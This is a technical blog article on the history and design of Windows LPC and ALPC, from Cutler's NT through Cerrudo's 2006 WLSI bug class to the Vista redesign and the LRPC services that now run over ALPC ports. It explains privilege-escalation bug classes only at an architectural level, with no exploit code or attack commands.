&lt;p&gt;Double-click an installer. The screen dims, a familiar dialog asks whether you want to allow this app to make changes, and a moment later either nothing happens or the installer keeps running. That moment of dim-and-prompt -- the &lt;a href=&quot;https://paragmali.com/blog/adminless-how-windows-finally-made-elevation-a-security-boun/&quot; rel=&quot;noopener&quot;&gt;User Account Control&lt;/a&gt; consent dialog -- is the most-seen artefact of one of the most-attacked primitives in the Windows kernel: a four-phase handshake on an asynchronous local-IPC port whose name does not appear in any Win32 or WDK reference Microsoft publishes.&lt;/p&gt;
&lt;p&gt;Trace the call from the user side. The Explorer shell invokes &lt;code&gt;ShellExecuteEx&lt;/code&gt; with the verb set to &lt;code&gt;runas&lt;/code&gt;. That call does not magically elevate the process; it sends a request &lt;em&gt;to another process&lt;/em&gt;, the &lt;strong&gt;Application Information service&lt;/strong&gt; (&lt;code&gt;appinfo&lt;/code&gt;) running as &lt;code&gt;svchost.exe -k netsvcs&lt;/code&gt; with SYSTEM authority [@msdocs-svchost] [@forshaw-rpc-2019]. The hand-off is an RPC call. The RPC runtime, asked for a local endpoint, selects the &lt;code&gt;ncalrpc&lt;/code&gt; protocol sequence -- &quot;Local procedure call&quot; in Microsoft&apos;s own protocol-sequence reference [@msdocs-protseq]. Underneath that string is the LRPC transport in &lt;code&gt;rpcrt4.dll&lt;/code&gt;, and underneath the LRPC transport is a kernel ALPC port that lives at the &lt;a href=&quot;https://paragmali.com/blog/the-object-manager-namespace/&quot; rel=&quot;noopener&quot;&gt;Object Manager name&lt;/a&gt; &lt;code&gt;\RPC Control\appinfo&lt;/code&gt;. The kernel resolves the name, the handshake completes, and a single syscall named &lt;code&gt;NtAlpcSendWaitReceivePort&lt;/code&gt; [@ntdoc-ntalpc] carries the request message into the SYSTEM-context server and the reply back.&lt;/p&gt;
&lt;p&gt;That syscall is the load-bearing entry point for the entire local-IPC fabric. Microsoft Learn does not publish a reference page for it. The de facto reference is a community-maintained header dump at &lt;code&gt;ntdoc.m417z.com&lt;/code&gt; [@ntdoc-ntalpc] that lists all eight parameters of the function. The kernel object behind the call is the &lt;code&gt;_ALPC_PORT&lt;/code&gt;, and the per-connection structure layouts are documented only on Geoff Chappell&apos;s site [@chappell-alpc] [@chappell-alpcp] and inside the chapter named &lt;em&gt;Advanced local procedure call (ALPC)&lt;/em&gt; of &lt;em&gt;Windows Internals 7e Part 2&lt;/em&gt; [@wininternals-7e].&lt;/p&gt;

The kernel object and syscall family that replaced classic LPC in Windows Vista (November 2006). ALPC is an asynchronous, message-and-attribute IPC primitive built around the `_ALPC_PORT` object. The user-mode entry points are the undocumented `Nt*Alpc*` and `Alpc*` functions exported from `ntdll.dll`. Every local RPC call in modern Windows transits an ALPC port [@csandker-alpc].

The Microsoft RPC runtime&apos;s transport selected when an application binds to the `ncalrpc` protocol sequence [@msdocs-protseq]. LRPC layers the RPC interface-registration model -- IDL, NDR marshalling, security callbacks -- on top of ALPC ports. LRPC is implemented inside `rpcrt4.dll`; the kernel does not know it exists. The kernel sees only ALPC messages.
&lt;p&gt;The abbreviation collision is real and bites every newcomer. &lt;strong&gt;LPC&lt;/strong&gt; is the original Windows NT 3.1 kernel primitive. &lt;strong&gt;LRPC&lt;/strong&gt; is the RPC runtime&apos;s local transport, named in Windows NT 3.5 (1994), a full decade before ALPC existed [@custer-solomon-2e]. LRPC was a transport name when the underlying kernel object was still LPC. Vista renamed the kernel object to ALPC; nobody renamed the transport. The two abbreviations differ by one letter and refer to different layers.&lt;/p&gt;
&lt;p&gt;Two layers sit on top of one kernel object. The kernel layer is what &lt;code&gt;Nt*Alpc*&lt;/code&gt; syscalls touch. The user-mode layer is the RPC runtime&apos;s interface dispatch -- the IDL stubs, the NDR encoders, the per-interface security callback the application registers with &lt;code&gt;RpcServerRegisterIf2&lt;/code&gt; [@msdocs-rpcregisterif2]. The rest of this article pulls these two layers apart, walks the history that produced them, and explains why almost every Patch Tuesday since 2018 has shipped fixes inside the second one.&lt;/p&gt;

sequenceDiagram
    participant Client as Client (ShellExecuteEx peer)
    participant ConnPort as Connection port \RPC Control\appinfo
    participant CommPort as Per-connection communication ports (unnamed)
    participant Server as AppInfo service (SYSTEM)
    Client-&amp;gt;&amp;gt;ConnPort: NtAlpcConnectPort (CONNECT)
    ConnPort-&amp;gt;&amp;gt;Server: ALPC connect message queued
    Server-&amp;gt;&amp;gt;CommPort: NtAlpcAcceptConnectPort (ACCEPT, returns paired handles)
    Client-&amp;gt;&amp;gt;CommPort: NtAlpcSendWaitReceivePort (REQUEST)
    CommPort-&amp;gt;&amp;gt;Server: ALPC message with NDR-encoded args
    Server-&amp;gt;&amp;gt;CommPort: NtAlpcSendWaitReceivePort (REPLY)
    CommPort-&amp;gt;&amp;gt;Client: NDR-encoded reply delivered
    Client-&amp;gt;&amp;gt;CommPort: NtAlpcDisconnectPort (CLOSE)
&lt;p&gt;The diagram is the article in miniature. Three of the four labelled actors are kernel objects: a named connection port, an unnamed pair of communication ports, and the message queue between them. The fourth is application code running in two different processes. The bugs of the next thirteen years live in the application code. The diagram&apos;s correctness rests on a structural fact almost every secondary writeup gets wrong, and Section 4 spells it out in full.&lt;/p&gt;
&lt;p&gt;If this primitive is everywhere, why does nobody talk about it? Because nobody had to, for thirteen years.&lt;/p&gt;
&lt;h2&gt;2. Origins -- Cutler&apos;s NT and the Birth of LPC (1989-1993)&lt;/h2&gt;
&lt;p&gt;Dave Cutler talked about it, in October 1988, to a room of people he was trying to recruit out of Digital Equipment Corporation [@zachary-showstopper]. The pitch was a from-scratch portable operating system at Microsoft. The architectural commitment that mattered for our story was a microkernel-style design: the Windows personality, the OS/2 personality, the POSIX personality would all run as user-mode subsystems, each in its own process, talking to clients through a fast in-machine remote procedure call. The kernel would not implement the Win32 API directly. The kernel would implement an IPC primitive shaped like a procedure call and cheap enough to use for every Win32 API a process made.&lt;/p&gt;
&lt;p&gt;That decision created a design problem the team had to solve before any of the subsystems could be written. Microkernel-style separation of subsystems means that the Win32 client of &lt;code&gt;CreateWindow&lt;/code&gt; is in one process and the Win32 server that draws the window is in another. Every API call crosses a process boundary. The IPC primitive that carries the crossing has to look like a function call, return like a function call, and cost no more than tens of microseconds. The Cutler team -- Lou Perazzoli, Mark Lucovsky, Steven Wood, Darryl Havens, and the larger NT design group [@zachary-showstopper] -- shipped that primitive as &lt;strong&gt;Local Procedure Call&lt;/strong&gt;, or LPC, with the first release of Windows NT in July 1993. Helen Custer documented the design that same year in &lt;em&gt;Inside Windows NT&lt;/em&gt; [@custer-print], the canonical first-edition print primary.&lt;/p&gt;

The original Windows NT kernel IPC primitive, introduced with NT 3.1 in July 1993 as a synchronous inter-process communication facility [@csandker-alpc]. LPC was synchronous-call-shaped, used three port objects per connection (one named connection port plus two unnamed communication ports), and was the transport for every Win32 API call into the Client/Server Runtime Subsystem (CSRSS) until Windows Vista. The kernel removed classic LPC entirely by Windows 7; legacy `NtCreatePort` callers were silently redirected onto the ALPC implementation [@csandker-alpc].
&lt;p&gt;The classic LPC mechanism worked like this. A server process calls &lt;code&gt;NtCreatePort&lt;/code&gt; to create a &lt;em&gt;connection port&lt;/em&gt; under an Object Manager name (for example, &lt;code&gt;\Windows\ApiPort&lt;/code&gt; for CSRSS). The server then waits on the connection port. A client process opens the connection port by name and calls &lt;code&gt;NtConnectPort&lt;/code&gt; to request a session. The kernel creates two new, unnamed &lt;em&gt;communication ports&lt;/em&gt; -- one the client holds, one the server holds -- and ties them to the connection through the kernel&apos;s port-routing tables. From that point on, the client and server send messages through their respective communication-port handles; neither party has to look up the other in the Object Manager namespace. The three-port model is the architectural ancestor of every ALPC handshake the rest of this article will walk.&lt;/p&gt;

flowchart LR
    A[Client process] -- &quot;NtConnectPort by name&quot; --&amp;gt; B[Connection port \Windows\ApiPort -- NAMED]
    B -- &quot;NtAcceptConnectPort&quot; --&amp;gt; C[Server process]
    C -- &quot;issues a pair of handles&quot; --&amp;gt; D[Client comm port -- UNNAMED]
    C -- &quot;issues a pair of handles&quot; --&amp;gt; E[Server comm port -- UNNAMED]
    A -- &quot;NtRequestWaitReplyPort&quot; --&amp;gt; D
    D -- &quot;kernel routes the message&quot; --&amp;gt; E
    E -- &quot;delivered to&quot; --&amp;gt; C
&lt;p&gt;The two design pinch-points that Vista would later have to fix are visible already in the 1993 mechanism. First, the call surface was synchronous: &lt;code&gt;NtRequestWaitReplyPort&lt;/code&gt; sent a message and blocked the caller until the reply came back, which forced the higher-level RPC runtime to wrap its own asynchronous machinery around the syscall and doubled the syscall cost for every async RPC. Second, the message payload had a small fixed inline budget -- on the order of 256 bytes [@csandker-alpc] -- with anything larger requiring an explicit &lt;code&gt;NtMapViewOfSection&lt;/code&gt; dance to set up a shared section the server would then peek into. The split between &quot;short message in the syscall&quot; and &quot;long payload in a shared section&quot; was awkward, racy, and a perennial source of off-by-one bugs in the server stubs.&lt;/p&gt;
&lt;p&gt;The third pinch-point was security, and it is the one Cesar Cerrudo will name in 2006. LPC&apos;s access check happened once, at &lt;code&gt;NtConnectPort&lt;/code&gt;, against the connection port&apos;s discretionary access control list (DACL). After the handshake, the kernel had no further opinion about who could send what to whom over the established channel. The server trusted every message it received because the kernel had already vouched that the client cleared the DACL at connect time. In 1993 that trust model was fine. The only callers of CSRSS were Win32 client processes the team controlled. POSIX clients talked to the POSIX subsystem; OS/2 clients talked to the OS/2 subsystem; the trust boundaries were the subsystem boundaries and nobody crossed them on purpose.&lt;/p&gt;

The microkernel idea -- pull as much out of the kernel as possible, run it as user-mode servers -- was a late-1980s academic enthusiasm, energised by Carnegie Mellon&apos;s Mach. Cutler brought it to NT after building VMS and the never-shipped Mica research kernel at Digital. The catch was performance. Every API call that used to be a function call inside the kernel now had to be a context switch, a message copy, and a reply, twice. If that round trip cost a millisecond, Windows would feel like a 1980s timesharing system. LPC&apos;s job was to make it cost microseconds, and the team&apos;s success there is one reason NT could ship at all. The structural cost -- a synchronous primitive whose security check ran once and then trusted the channel -- was not the 1993 team&apos;s problem, because they controlled both ends of every conversation.
&lt;p&gt;The 1993 design assumed the only callers of CSRSS were Win32 client processes the team controlled. That assumption held for thirteen years.&lt;/p&gt;
&lt;h2&gt;3. The First Reckoning -- LPC&apos;s Failure Modes and Cerrudo&apos;s WLSI 2006&lt;/h2&gt;
&lt;p&gt;In March 2006, at Black Hat Europe in Amsterdam, Cesar Cerrudo gave a talk titled &lt;em&gt;WLSI -- Windows Local Shellcode Injection&lt;/em&gt;. Twelve weeks later, Microsoft shipped the Vista ALPC redesign. The temporal compression is intentional, but it is not the whole story: the Vista redesign had been underway inside the kernel team for years before Cerrudo&apos;s talk. What the talk did was give the public security community a name and a shape for the structural class of bug the redesign was about to address.&lt;/p&gt;
&lt;p&gt;Cerrudo&apos;s paper, archived at Exploit-DB under the title &lt;em&gt;WLSI Windows Local Shellcode Injection&lt;/em&gt; and dated March 14, 2006 [@cerrudo-exploitdb], with the speaker deck mirrored on Black Hat&apos;s own server [@cerrudo-bh-pdf], walked an end-to-end attack on an LPC server inside CSRSS. The exact server is less important than the attack&apos;s three-clause shape, which Cerrudo articulated and which would recur, over the next two decades, in every later ALPC and LRPC privilege-escalation primitive.&lt;/p&gt;

flowchart LR
    A[Port is reachable -- the connection port DACL admits the attacker] --&amp;gt; D[Local elevation-of-privilege primitive]
    B[Server trusts the message -- no per-message identity check or per-procedure authorization] --&amp;gt; D
    C[Channel survives the access check -- LPC checks the DACL once at NtConnectPort, then forgets] --&amp;gt; D
&lt;p&gt;Clause one: &lt;em&gt;the port is reachable&lt;/em&gt;. The LPC connection port has a DACL; the attacker happens to be inside it. For CSRSS&apos;s &lt;code&gt;\Windows\ApiPort&lt;/code&gt;, that means &quot;any Win32 process on the desktop&quot;, which is exactly what NT was supposed to permit. Clause two: &lt;em&gt;the DACL is permissive&lt;/em&gt;. Every authenticated user is in scope of the LPC servers that brokered the user-mode Win32 API surface, by design. Clause three: &lt;em&gt;the server trusts the message&lt;/em&gt;. The LPC kernel object exposes a &lt;code&gt;PORT_MESSAGE&lt;/code&gt; header with two fields the receiver can use for bookkeeping -- a process ID and a thread ID. The fields are not authenticated. The receiving server, in the WLSI demonstration, read attacker-controlled offsets and lengths out of the message body and walked into the server&apos;s own address space.&lt;/p&gt;
&lt;p&gt;The three clauses together produce a local elevation primitive. None of the clauses, taken individually, is a kernel bug. None, taken individually, is even an application bug. The bug -- in the WLSI exemplar -- is that the CSRSS server trusted a length field that came from a process the server itself had no reason to trust. The OS did exactly what its security model promised. The application did exactly what the IPC primitive made easy.&lt;/p&gt;

A Windows access control list attached to a securable object (a file, a registry key, a kernel object such as an LPC or ALPC port) that names the security principals allowed or denied each access right. For an LPC connection port, the DACL governs whether a calling process is allowed to open the port at all. Once the port is opened, the DACL is no longer consulted for messages flowing across the established connection -- which is exactly the once-and-done check at the centre of Cerrudo&apos;s structural class.

The 1993 trust model held until 2006 because the team controlled both ends of every conversation. Cerrudo named the class of bug that emerged when that assumption stopped holding.
&lt;p&gt;That structural class is the load-bearing reason the Vista redesign was about to be a redesign and not a patch. The three LPC failure modes the kernel team had identified -- the ones that motivated re-architecting the primitive rather than fixing the WLSI server -- compose a near-perfect mirror of Cerrudo&apos;s three clauses. They are: (1) the synchronous-only design forced the RPC runtime to layer its own asynchronous wrapper around &lt;code&gt;NtRequestWaitReplyPort&lt;/code&gt;, doubling the per-call syscall cost for async RPC; (2) the 256-byte inline plus shared-section dance was awkward and prone to race conditions in the server stub; (3) the port-DACL-only security model checked access once at connect and then trusted the channel, with no kernel primitive for per-message caller identity. A redesign was the only way to attack all three at once without breaking every NT 4-era server in the field.&lt;/p&gt;
&lt;p&gt;One LPC failure mode that did not make Cerrudo&apos;s slide and that Microsoft has never publicly discussed in detail was the reply-port confusion class. In classic LPC, a server&apos;s reply traveled back over the client&apos;s communication port handle, and a misbehaving server could be tricked into replying to the wrong client when multiple connections were interleaved. Microsoft addressed this quietly in the Vista era; the only public references are footnotes in &lt;em&gt;Windows Internals&lt;/em&gt; editions and the occasional aside in csandker [@csandker-alpc]. The public security community did not catch the bug class at the time.&lt;/p&gt;
&lt;p&gt;In November 2006 -- eight months after WLSI -- Windows Vista shipped. The new kernel called the replacement primitive &lt;strong&gt;Advanced LPC&lt;/strong&gt;. The redesign closed half of Cerrudo&apos;s structural class -- the &lt;em&gt;permissive port DACL&lt;/em&gt; half, by giving servers fine-grained tools to control who reaches their connection ports and by introducing a per-message security attribute the server could query for caller identity. It left the other half completely intact, because the other half is not a kernel property. The other half lives in the user-mode RPC runtime and in the application code that registers RPC interfaces on top of ALPC ports. That intact half is what the next thirteen years of public security research is about.&lt;/p&gt;
&lt;p&gt;The naive read of Cerrudo&apos;s paper is &quot;Microsoft will fix the bug.&quot; The structural read is harder: Cerrudo did not find a bug. He named a class of bug whose root cause is a property of the trust model. The Vista redesign closed the half of the class the kernel could close. It could not close the rest, because the rest is application code, and the kernel cannot inspect application code.&lt;/p&gt;
&lt;h2&gt;4. The Breakthrough -- ALPC, the Vista Redesign, and the Message-Attribute System&lt;/h2&gt;
&lt;p&gt;The Vista kernel team&apos;s answer to Cerrudo was not a patch. It was a complete replacement of the kernel object.&lt;/p&gt;
&lt;p&gt;ALPC re-cast the LPC port as an &lt;strong&gt;asynchronous, message-and-attribute-based&lt;/strong&gt; primitive. The classic LPC quartet -- &lt;code&gt;NtRequestPort&lt;/code&gt;, &lt;code&gt;NtReplyPort&lt;/code&gt;, &lt;code&gt;NtRequestWaitReplyPort&lt;/code&gt;, &lt;code&gt;NtReplyWaitReplyPort&lt;/code&gt; -- collapsed into a single syscall, &lt;code&gt;NtAlpcSendWaitReceivePort&lt;/code&gt; [@ntdoc-ntalpc], with eight parameters whose combinations express every variant the older quartet supported. The kernel object behind the syscall is the &lt;code&gt;_ALPC_PORT&lt;/code&gt;. The structure layout is documented only in the chapter named &lt;em&gt;Advanced local procedure call (ALPC)&lt;/em&gt; of &lt;em&gt;Windows Internals 7e Part 2&lt;/em&gt; [@wininternals-7e], in the reverse-engineered header dumps on Geoff Chappell&apos;s site [@chappell-alpc] [@chappell-alpcp], and in the community-maintained &lt;code&gt;phnt&lt;/code&gt; headers that the Process Hacker project ships. None of those is a Microsoft Learn page.&lt;/p&gt;

The kernel object at the centre of Vista-and-later local IPC. Named connection ports are referenced by Object Manager name (typically under `\RPC Control`, `\BaseNamedObjects`, or per-session AppContainer subtrees). The per-connection communication ports created by `NtAlpcAcceptConnectPort` are unnamed and exist only as handles in the connecting and accepting processes. The structure layout is undocumented by Microsoft; the canonical reverse-engineered reference is Geoff Chappell&apos;s site [@chappell-alpc].
&lt;p&gt;The user-mode syscall surface, enumerated as exhaustively as anyone outside Microsoft can: &lt;code&gt;NtAlpcCreatePort&lt;/code&gt;, &lt;code&gt;NtAlpcConnectPort&lt;/code&gt;, &lt;code&gt;NtAlpcAcceptConnectPort&lt;/code&gt;, &lt;code&gt;NtAlpcSendWaitReceivePort&lt;/code&gt;, &lt;code&gt;NtAlpcDisconnectPort&lt;/code&gt;, &lt;code&gt;NtAlpcCancelMessage&lt;/code&gt;, &lt;code&gt;NtAlpcCreatePortSection&lt;/code&gt;, &lt;code&gt;NtAlpcCreateResourceReserve&lt;/code&gt;, plus the &lt;code&gt;PORT_ATTRIBUTES&lt;/code&gt; and message-attribute structures that decorate each call. Microsoft Learn does not list any of them under a Win32 or WDK developer-facing reference. NtDoc [@ntdoc-ntalpc] is the de facto syscall reference, and the &lt;em&gt;Windows Internals 7e Part 2&lt;/em&gt; chapter is the de facto architectural reference.&lt;/p&gt;

Microsoft has documented the user-mode RPC runtime exhaustively on Learn -- the IDL syntax, the marshalling rules, the binding-handle API, the interface-registration flags. The `Nt*Alpc*` and `Alpc*` kernel surface is the deliberate exception. Microsoft&apos;s framing is that ALPC is an *internal* implementation detail of the RPC runtime, not a stable developer-facing API. Application authors are supposed to write RPC code, not ALPC code. The framing is defensible -- the ALPC ABI does change between Windows versions -- but it leaves the entire defender community reverse-engineering the surface from public symbols, the *Windows Internals* book series, NtDoc, Geoff Chappell, and the open-source `phnt` headers. The Vista-and-later structural correctness story this article tells is one that Microsoft has never written down for outside readers.
&lt;p&gt;The structural break with classic LPC is the &lt;strong&gt;message-attribute&lt;/strong&gt; system. Every ALPC message can carry four optional attributes, each of which targets one of the awkward LPC patterns the old kernel forced server authors to roll by hand.&lt;/p&gt;

An optional decoration on an ALPC message that lets the sender or receiver request a kernel service in band with the message itself. The four attribute types are **Context**, **Handle**, **Security**, and **View**. Each one targets a workflow that classic LPC required application code to perform out of band; in ALPC the kernel does the work atomically with the message exchange.
&lt;p&gt;&lt;strong&gt;The Context attribute&lt;/strong&gt; carries a per-message per-client cookie the server uses to associate the message with a logical operation. In classic LPC, a server tracking a multi-step protocol had to maintain its own client-to-state map indexed by client process ID, with all the race conditions that map invited; the Context attribute moves that bookkeeping into the kernel and makes it correct by construction.&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;The Handle attribute&lt;/strong&gt; is first-class handle passing inside the message itself. In classic LPC, transferring a kernel handle from sender to receiver required the sender to call &lt;code&gt;DuplicateHandle&lt;/code&gt; with the receiver&apos;s process handle, hope the receiver hadn&apos;t exited, and then send the resulting handle value in the message body. The Handle attribute lets the kernel do the duplication atomically with delivery; the receiver finds the duplicated handle already in its own handle table when the message lands.&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;The Security attribute&lt;/strong&gt; is the per-message identity primitive whose absence Cerrudo had named in 2006. The sender can opt to attach its caller token to a message; the receiver can opt to query the token (process ID, thread ID, integrity level, AppContainer SID) when it dispatches the message. The classic LPC pattern -- &quot;trust the channel because the kernel checked the DACL at connect&quot; -- gets replaced by &quot;ask the kernel who is actually sending this message right now.&quot;&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;The View attribute&lt;/strong&gt; is the shared-section dance, rewritten. In classic LPC, payloads larger than the inline budget required the sender to call &lt;code&gt;NtCreateSection&lt;/code&gt;, both parties to call &lt;code&gt;NtMapViewOfSection&lt;/code&gt;, and the receiver to peek into the shared mapping. The View attribute hands the receiver a section view automatically as a side effect of message delivery; no out-of-band coordination is required.&lt;/p&gt;

flowchart TD
    A[Context attribute] --&amp;gt; A1[Replaces: server-side client-to-state map indexed by PID]
    B[Handle attribute] --&amp;gt; B1[Replaces: out-of-band DuplicateHandle dance]
    C[Security attribute] --&amp;gt; C1[Replaces: trust the channel because DACL was checked at connect]
    D[View attribute] --&amp;gt; D1[Replaces: NtCreateSection plus NtMapViewOfSection dance for large payloads]
&lt;p&gt;The handshake topology survives from classic LPC and tightens. The server creates a named connection port with &lt;code&gt;NtAlpcCreatePort&lt;/code&gt;. The client opens the connection port by name with &lt;code&gt;NtAlpcConnectPort&lt;/code&gt; and sends an initial connect message; the kernel queues the connect on the server&apos;s port. The server calls &lt;code&gt;NtAlpcAcceptConnectPort&lt;/code&gt;, and the kernel returns a &lt;em&gt;pair&lt;/em&gt; of communication-port handles -- one to the client, one to the server -- that are bound to that single connection. From that point on, the kernel routes messages through the paired handles, and every send or receive is a single call to &lt;code&gt;NtAlpcSendWaitReceivePort&lt;/code&gt;. Asynchronous is the default; synchronous semantics are a flag combination. The per-port message queue, the blocked-receiver wake, and the cross-port routing all run inside the kernel dispatcher.&lt;/p&gt;

flowchart LR
    A[Client process] -- &quot;NtAlpcConnectPort by name&quot; --&amp;gt; B[Connection port -- NAMED in \RPC Control]
    B -- &quot;kernel queues the connect&quot; --&amp;gt; C[Server process]
    C -- &quot;NtAlpcAcceptConnectPort&quot; --&amp;gt; D[Paired comm ports -- UNNAMED]
    A -- &quot;NtAlpcSendWaitReceivePort&quot; --&amp;gt; D
    D -- &quot;kernel routing&quot; --&amp;gt; C
&lt;p&gt;Here is the structural correction the input premise to this article got wrong, and that almost every secondary writeup gets wrong. &lt;strong&gt;Only the named connection port has an Object Manager name.&lt;/strong&gt; The per-connection communication ports created by &lt;code&gt;NtAlpcAcceptConnectPort&lt;/code&gt; are unnamed. They have no path under &lt;code&gt;\RPC Control&lt;/code&gt; or &lt;code&gt;\BaseNamedObjects&lt;/code&gt; or anywhere else. They exist only as handles in the address spaces of the two processes that completed the handshake. No third party can open them, because no third party has a name with which to ask the Object Manager for them.&lt;/p&gt;
&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;Key idea:&lt;/strong&gt; ALPC&apos;s structural correctness rests on a single move: the per-connection communication ports are unnamed. Only the parties that completed the handshake can address the channel. The kernel does not let anyone else find it. This is the half of Cerrudo&apos;s structural class the Vista redesign actually closed.&lt;/p&gt;
&lt;/blockquote&gt;
&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;Note:&lt;/strong&gt; A statement like &quot;every ALPC port has an Object Manager name&quot; is wrong, and it propagates a wrong threat model. Named ports are the entry points an attacker can knock on. Unnamed communication ports are the established channels the attacker cannot reach without first being admitted through the connection port&apos;s DACL. Defenders who get this wrong start hunting for the unnamed children in the Object Manager namespace and find nothing, then conclude the tooling is broken. The tooling is fine. The ports are not there.&lt;/p&gt;
&lt;/blockquote&gt;
&lt;p&gt;Microsoft&apos;s documentation choice has consequences for tooling. The Wireshark dissector for MSRPC handles the on-the-wire NDR encoding well, but it has no view into the kernel ALPC layer because the kernel does not emit a packet capture. To see ALPC at the kernel level the tooling has to subscribe to the &lt;code&gt;Microsoft-Windows-Kernel-ALPC&lt;/code&gt; ETW provider [@msdocs-etwsys], and even that provider is gated behind &lt;code&gt;EVENT_TRACE_SYSTEM_LOGGER_MODE&lt;/code&gt;, which a non-SYSTEM caller cannot enable. The structural opacity of the kernel layer is partly an artefact of the deliberate &quot;no public WDK developer-facing reference&quot; position.&lt;/p&gt;
&lt;p&gt;Backward compatibility was preserved by silent rewiring rather than by parallel kernel objects. The classic LPC syscall names continue to link in any pre-Vista binary, but from Windows 7 onward the kernel routes those calls into the ALPC implementation underneath [@csandker-alpc]. Classic LPC, as an independent kernel object, no longer exists. The 1993 syscall surface is alive only as a thin compatibility shim. The 2006 kernel object is what every modern Windows service actually uses.&lt;/p&gt;
&lt;p&gt;The Vista redesign closed the &lt;em&gt;permissive port DACL&lt;/em&gt; half of the structural problem. It left the &lt;em&gt;interface callback returns RPC_S_OK when it should return RPC_S_ACCESS_DENIED&lt;/em&gt; half completely intact.The Vista kernel team&apos;s collective attribution stops short of naming individual ALPC architects. &lt;em&gt;Windows Internals 7e Part 2&lt;/em&gt; [@wininternals-7e] credits the work institutionally rather than to a single engineer, and no public Microsoft artefact identifies a single ALPC architect by name; secondary attributions in conference talks and blog posts trace back to footnotes rather than to primary record. That intact half is the rest of this article.&lt;/p&gt;
&lt;h2&gt;5. The Universalisation -- ALPC as the Local IPC Fabric (2009-2013)&lt;/h2&gt;
&lt;p&gt;By 2013, ALPC ran the local-IPC traffic of every Windows service that mattered. The kernel team had removed classic LPC. The Vista replacement had not been &lt;em&gt;replaced&lt;/em&gt;; it had been &lt;em&gt;adopted&lt;/em&gt;.&lt;/p&gt;
&lt;p&gt;The transition was technically backwards-compatible. Pre-Vista binaries that called &lt;code&gt;NtCreatePort&lt;/code&gt; and &lt;code&gt;NtRequestWaitReplyPort&lt;/code&gt; continued to link and run; the kernel preserved the syscall names and silently rerouted the calls into the ALPC implementation underneath [@csandker-alpc]. The compatibility was not lossless -- the old single-message-per-call semantics map onto the ALPC asynchronous primitive only at the cost of an extra wait -- but it was good enough that no Microsoft-shipped service ever needed a port from classic LPC. Every service author upgrading to Vista or later was implicitly upgraded to ALPC.&lt;/p&gt;
&lt;p&gt;By Windows 8.1 the roll-call of services riding LRPC on ALPC was effectively the roll-call of services that ship with Windows. The Client/Server Runtime Subsystem (CSRSS) had been ALPC-only since Vista. The Local Security Authority Subsystem Service (LSASS) -- which brokers logon, token issuance, and Kerberos ticket caching -- exposes its API surface over LRPC. The Service Control Manager (SCM, &lt;code&gt;services.exe&lt;/code&gt;) accepts service-control commands over an LRPC interface. The DCOM activation service (&lt;code&gt;rpcss&lt;/code&gt;) marshals every local COM activation request through an LRPC pipeline. Windows Error Reporting, the audio service (&lt;code&gt;audiosrv&lt;/code&gt;), Task Scheduler (&lt;code&gt;schedsvc&lt;/code&gt;/&lt;code&gt;schrpc&lt;/code&gt;), the Application Information service (&lt;code&gt;appinfo&lt;/code&gt;) that brokers UAC, the Encrypting File System extension (&lt;code&gt;efslsaext&lt;/code&gt;, the EFSRPC server documented in the [MS-EFSR] specification [@ms-efsr]), the print spooler (&lt;code&gt;spoolsv&lt;/code&gt;), and the Background Intelligent Transfer Service (BITS) all expose at least one LRPC interface for client communication [@csandker-rpc].&lt;/p&gt;

flowchart TD
    K[Kernel ALPC layer -- _ALPC_PORT objects, NtAlpcSendWaitReceivePort dispatcher]
    K --&amp;gt; CSRSS[CSRSS -- Win32 subsystem]
    K --&amp;gt; LSASS[LSASS -- logon and token issuance]
    K --&amp;gt; SCM[Service Control Manager]
    K --&amp;gt; RPCSS[RPCSS -- DCOM activator and epmapper]
    K --&amp;gt; APPINFO[AppInfo -- UAC consent broker]
    K --&amp;gt; SPOOL[Print Spooler]
    K --&amp;gt; SCHRPC[Task Scheduler -- schrpc and schedsvc]
    K --&amp;gt; BITS[BITS -- background transfers]
    K --&amp;gt; AUDIO[Audio service -- audiosrv]
    K --&amp;gt; EFS[EFS -- efslsaext]
&lt;p&gt;That fan-out is the article&apos;s load-bearing diagram for understanding why ALPC is the most-attacked local IPC fabric in modern Windows. Every named service in that diagram is reachable over an LRPC interface. Every LRPC interface registers a per-interface security callback through &lt;code&gt;RpcServerRegisterIf2&lt;/code&gt; [@msdocs-rpcregisterif2] or &lt;code&gt;RpcServerRegisterIf3&lt;/code&gt; [@msdocs-rpcregisterif3]. Every callback is application code that the kernel cannot inspect. A single permissive interface in a single one of those services is a structural primitive that works against the transport every service uses. Trail of Bits, announcing their RPC Investigator tool in January 2023, captured the surface area in one line: MSRPC is &quot;involved on some level in nearly every activity that you can take on a Windows system, from logging in to your laptop to opening a file&quot; [@tob-rpcinv-blog].&lt;/p&gt;

MSRPC is involved on some level in nearly every activity that you can take on a Windows system, from logging in to your laptop to opening a file. -- Trail of Bits, *RPC Investigator* announcement, January 2023 [@tob-rpcinv-blog]
&lt;p&gt;To see the fabric in operation, walk one call. An unprivileged user invokes &lt;code&gt;StartServiceW&lt;/code&gt; from the SCM client library inside &lt;code&gt;sechost.dll&lt;/code&gt;. The library binds to the SCM&apos;s local RPC endpoint -- the &lt;code&gt;\RPC Control\ntsvcs&lt;/code&gt; ALPC port that the Service Control Manager registers at boot. The MIDL-generated client stub packs the service name and arguments into NDR and hands them to &lt;code&gt;NdrClientCall3&lt;/code&gt;. &lt;code&gt;rpcrt4.dll&lt;/code&gt; crosses into the kernel through &lt;code&gt;NtAlpcSendWaitReceivePort&lt;/code&gt;. The kernel routes the ALPC message to the SCM&apos;s blocked worker thread inside &lt;code&gt;services.exe&lt;/code&gt;. The worker, running as SYSTEM, unpacks the NDR body with &lt;code&gt;NdrStubCall3&lt;/code&gt; and prepares to dispatch the server-side procedure. Before the procedure runs, the RPC runtime invokes the interface security callback, which checks whether the caller&apos;s token holds &lt;code&gt;SC_MANAGER_CONNECT&lt;/code&gt; and the target service&apos;s DACL grants &lt;code&gt;SERVICE_START&lt;/code&gt;. If the callback returns &lt;code&gt;RPC_S_OK&lt;/code&gt;, the SCM starts the service. The reply -- an NDR-encoded error code -- rides another &lt;code&gt;NtAlpcSendWaitReceivePort&lt;/code&gt; back to the client. One user call, five layers crossed, and the kernel never knew it was running an RPC.&lt;/p&gt;
